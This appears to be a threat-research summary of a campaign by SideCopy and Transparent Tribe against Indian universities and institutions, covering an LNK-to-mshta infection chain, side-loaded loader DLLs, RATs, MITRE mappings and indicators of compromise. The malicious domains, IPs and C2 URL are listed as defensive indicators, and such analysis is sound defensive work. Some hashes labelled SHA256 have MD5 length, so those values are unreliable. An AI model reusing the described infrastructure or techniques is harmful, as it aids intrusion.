Threat Research

The Overlapping Cyber Strategies of Transparent Tribe and SideCopy Against India

Cyble

Cyble researchers uncovered a SideCopy/Transparent Tribe overlap campaign targeting India, using a multistage infection chain that starts with a spam email leading to a malicious website, a LNK file that launches MSHTA, and loader DLLs to deploy Reverse RAT and Action RAT. The operation includes university-focused lure documents, DLL side-loading, and C2 communications, highlighting a versatile, persistent threat landscape in South Asia. Hashtags: #SideCopy #TransparentTribe #ReverseRAT #ActionRAT #LNK #HTA #MSHTA #IndianUniversities #India

Keypoints

  • CRIL identified a SideCopy APT campaign linked to Transparent Tribe with a focus on India and universities.
  • The infection chain begins with spam emails linking to a malicious site hosting files.zip and a lure document in lure folders such as “survey” and “economy.”
  • Initial access uses a Shortcut (LNK) file named “IT Trends.docx.lnk” that prompts mshta.exe to load HTA-based payloads.
  • Loader DLLs (PreBotHTta.dll) are decoded from Base64 data, deserialized via ActiveX, and used to drop lure documents and launch payloads like Reverse RAT and Action RAT.
  • Payloads establish C2 communication, run via HTTP(S) endpoints, and support a broad command set (file ops, registry, process, USB, and screenshot actions).
  • Antivirus-aware behavior includes different persistence and execution paths depending on installed AV (Kaspersky, Avast/AVG/Avira, Quick) and USB-based data theft via DoUSBWork.
  • IOCs include multiple domains, IPs, file hashes, LNK/HTA names, and DLLs (e.g., MSFTEDIT.dll, PreBotHta.dll) used across the campaign.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – The .lnk file triggers a command prompt prompting the launch of “mshta.exe,” which then connects to the URL below. Quote: “…the .lnk file triggers a command prompt prompting the launch of “mshta.exe,” which then connects to the URL below.”
  • [T1053] Scheduled Task/Job – The malware utilizes startup/persistence mechanisms via startup folder/Run keys to maintain execution. Quote: “persistence by adding a program to a startup folder or referencing it with a Registry run key.”
  • [T1047] Windows Management Instrumentation – Checks if Antivirus program is installed (via WMI). Quote: “Checks if Antivirus program is installed (via WMI)”
  • [T1547.001] Registry Run Keys / Startup Folder – Startup persistence via shortcuts in startup folder. Quote: “Startup folder to ensure persistence”
  • [T1574.002] DLL Side-Loading – The malware loads a malicious DLL (PreBotHTta.dll) through side-loading. Quote: “DLL Side-Loading” and “launch of PreBotHTta.dll”
  • [T1027] Obfuscated/Encrypted Files or Information – Base64-encoded payloads embedded in HTA/dynamic strings. Quote: “Base64-encoded strings” and “encoded in Base64 format.”
  • [T1027.002] Software Packing – Packaged/packed payloads within HTA/DLL workflows. Quote: “packed or crypted data” (Software Packing).
  • [T1140] Deobfuscate/Decode Files or Information – Base64 decoding of embedded payloads before writing to disk. Quote: “decodes the concatenated strings using the FromBase64Transform”
  • [T1112] Modify Registry – Uses reg.exe to modify the Windows registry for persistence. Quote: “Modify Registry” in table.
  • [T1082] System Information Discovery – Queries system information (host name, IP, OS, etc.). Quote: “sends a POST request with various system information” and “System Information Discovery” in table.
  • [T1083] File and Directory Discovery – Stealer enumerates files/directories during operations. Quote: “directories and files in a specified directory” in table.
  • [T1518.001] Security Software Discovery – Checks antivirus presence via WMI. Quote: “Security Software Discovery (T1518.001) – Checks if Antivirus program is installed (via WMI)”
  • [TA0011] C2 – Application Layer Protocol – RATs communicate with C2 servers over HTTP(S). Quote: “Malware exe communicate to C&C server.”
  • [T1105] Ingress Tool Transfer – Downloads additional payloads from web servers. Quote: “Downloads files from webservers via HTTP.”

Indicators of Compromise

  • [Domain] reviewassignment.online, reviewassignment.in – Malicious sites used in the campaign
  • [IP] 67.223.118.135, 64.188.27.144 – C2/C2-related infrastructure
  • [MD5] 6e02fe7c188c417802008e147c248eb1 – Shortcut (LNK) file
  • [SHA256] bc1acdca196f1ff72722243be2afe1429b88122afb9d4852d6d6e57689411d3d – Shortcut (LNK) file
  • [MD5] 80ac09458e5e5fbd8e500ef0f7313bd2 – 1.hta
  • [SHA256] 614896fea882b17b193b41d4e3e593ac – MSFTEDIT.dll (Action RAT)
  • [MD5] 5fc7a9d515067008095a439837881713 – PreBotHta.dll (stage 1)
  • [SHA256] 565cac3dffde44fa487014e69b13140a – PreBotHta.dll (Reverse RAT 2.0)
  • [Domain] reviewassignment.online/files/backup/ap.txt – Payload URL
  • [URL] hxxps://dns1.indianblog.xyz/dailyworkout – ReverseRAT/C2

Read more: https://cyble.com/blog/notorious-sidecopy-apt-group-sets-sights-on-indias-drdo/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint